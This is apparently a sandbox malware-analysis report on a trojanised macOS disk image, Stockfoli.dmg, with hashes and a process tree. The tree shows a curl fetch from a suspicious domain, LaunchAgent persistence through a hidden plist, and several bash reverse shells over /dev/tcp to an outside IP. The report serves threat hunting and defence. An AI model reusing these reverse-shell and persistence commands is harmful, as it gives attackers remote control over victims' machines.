Analysis
-
max time network: 159s
platform: macos_amd64
resource: macos
submitted: 24-06-2021 12:54
Static task
static1
General
-
Target: Stockfoli.dmg
-
Size: 11.2MB
-
MD5: 22a526c0658e542f24358178fb079c38
-
SHA1: 352985598e83b42e99dfcb19636227335a18f8c0
-
SHA256: 118ba3642fdff254e37aee1ff9552fe189f7b1f8d5302d51c5010335acce6c2c
-
SHA512: 73c37880c044235028708e81d840120e78951a5ab4c100338ee958bce2409890a3c9dee75eab95dd8e37e98bd73c4561ff7a3413669527fa5ef458cce26971af
Malware Config
Signatures
Processes (each entry reads: image path — command line — tree marker⤵ PID; the number before ⤵ appears to be the nesting depth). Summary of what this tree shows: run.sh inside the mounted app performs an HTTP fetch from owpqkszz.info with certificate checking disabled (curl -ks), a plist is copied to /Users/run/Library/LaunchAgents/.com.apple.upd.plist and loaded with launchctl (LaunchAgent persistence), and several interactive bash sessions are redirected over /dev/tcp to 193.37.212.176 on TCP ports 25733–25736 (reverse shells) — these paths, the domain, the IP and the port range are the indicators to hunt for.
-
/bin/sh — sh -c "sudo open /Volumes/Stockfoli/Stockfoli.app" — 1⤵ PID:552
-
/bin/bash — sh -c "sudo open /Volumes/Stockfoli/Stockfoli.app" — 1⤵ PID:552
-
/usr/bin/sudo — sudo open /Volumes/Stockfoli/Stockfoli.app — 1⤵ PID:552
-
/usr/bin/open — open /Volumes/Stockfoli/Stockfoli.app — 2⤵ PID:553
-
-
/Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli — /Volumes/Stockfoli/Stockfoli.app/Contents/MacOS/Stockfoli — 1⤵ PID:554
-
/bin/bash — /bin/bash -c "nohup sh '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh' </dev/null >/dev/null 2>&1 &" — 1⤵ PID:562
-
/usr/bin/nohup — nohup sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh — 2⤵ PID:563
-
-
/usr/bin/sh — sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh — 2⤵ PID:563
-
-
/bin/sh — sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh — 2⤵ PID:563
-
-
/bin/bash — sh /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/run.sh — 2⤵ PID:563
-
/usr/bin/curl — curl -ks "http://owpqkszz.info/link.php?run&91.219.237.21" — 3⤵ PID:585
-
-
/usr/bin/base64 — base64 --decode — 3⤵ PID:587
-
-
/bin/cat — cat /tmp/.com.apple.upd.plist — 3⤵ PID:588
-
-
/bin/cp — cp /tmp/.com.apple.upd.plist /Users/run/Library/LaunchAgents/.com.apple.upd.plist — 3⤵ PID:589
-
-
/bin/cat — cat /Users/run/Library/LaunchAgents/.com.apple.upd.plist — 3⤵ PID:590
-
-
/bin/launchctl — launchctl load /tmp/.com.apple.upd.plist — 3⤵ PID:591
-
-
/usr/bin/screen — screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1" — 3⤵ PID:596
-
-
-
/usr/bin/whoami — whoami — 1⤵ PID:566
-
/usr/bin/tr — tr -dc "[:alnum:].\\r" — 1⤵ PID:568
-
/usr/bin/tr — tr "[:upper:]" "[:lower:]" — 1⤵ PID:569
-
/usr/bin/curl — curl -s ipecho.net/plain — 1⤵ PID:572
-
/bin/bash — /bin/bash -c "nohup '/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio' </dev/null >/dev/null 2>&1 &" — 1⤵ PID:573
-
/usr/bin/nohup — nohup /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio — 2⤵ PID:574
-
-
/Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio — /Volumes/Stockfoli/Stockfoli.app/Contents/Resources/Stockfolio.app/Contents/MacOS/Stockfolio — 2⤵ PID:574
-
-
/bin/bash — /bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25734 0>&1'" — 1⤵ PID:575
-
/usr/bin/screen — screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1" — 1⤵ PID:575
-
/usr/bin/login — login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1" — 1⤵ PID:577
-
/bin/bash — bash -c "bash -i >/dev/tcp/193.37.212.176/25734 0>&1" — 2⤵ PID:580
-
/bin/bash — bash -i — 3⤵ PID:581
-
-
-
/bin/bash — /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25735 0>&1" — 1⤵ PID:578
-
/bin/bash — bash -i — 2⤵ PID:579
-
-
/usr/bin/tr — tr -dc "[:alnum:].\\r" — 1⤵ PID:583
-
/usr/bin/tr — tr "[:upper:]" "[:lower:]" — 1⤵ PID:584
-
/bin/launchctl — launchctl list — 1⤵ PID:594
-
/usr/bin/grep — grep upd — 1⤵ PID:595
-
/usr/bin/login — login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1" — 1⤵ PID:601
-
/bin/bash — bash -c "bash -i >/dev/tcp/193.37.212.176/25733 0>&1" — 2⤵ PID:603
-
/bin/bash — bash -i — 3⤵ PID:604
-
-
-
/bin/bash — /bin/bash -c "screen -d -m bash -c 'bash -i >/dev/tcp/193.37.212.176/25736 0>&1'" — 1⤵ PID:617
-
/usr/bin/screen — screen -d -m bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1" — 1⤵ PID:617
-
/usr/bin/login — login -pflq run /bin/bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1" — 1⤵ PID:619
-
/bin/bash — bash -c "bash -i >/dev/tcp/193.37.212.176/25736 0>&1" — 2⤵ PID:620
-
/bin/bash — bash -i — 3⤵ PID:621
-
-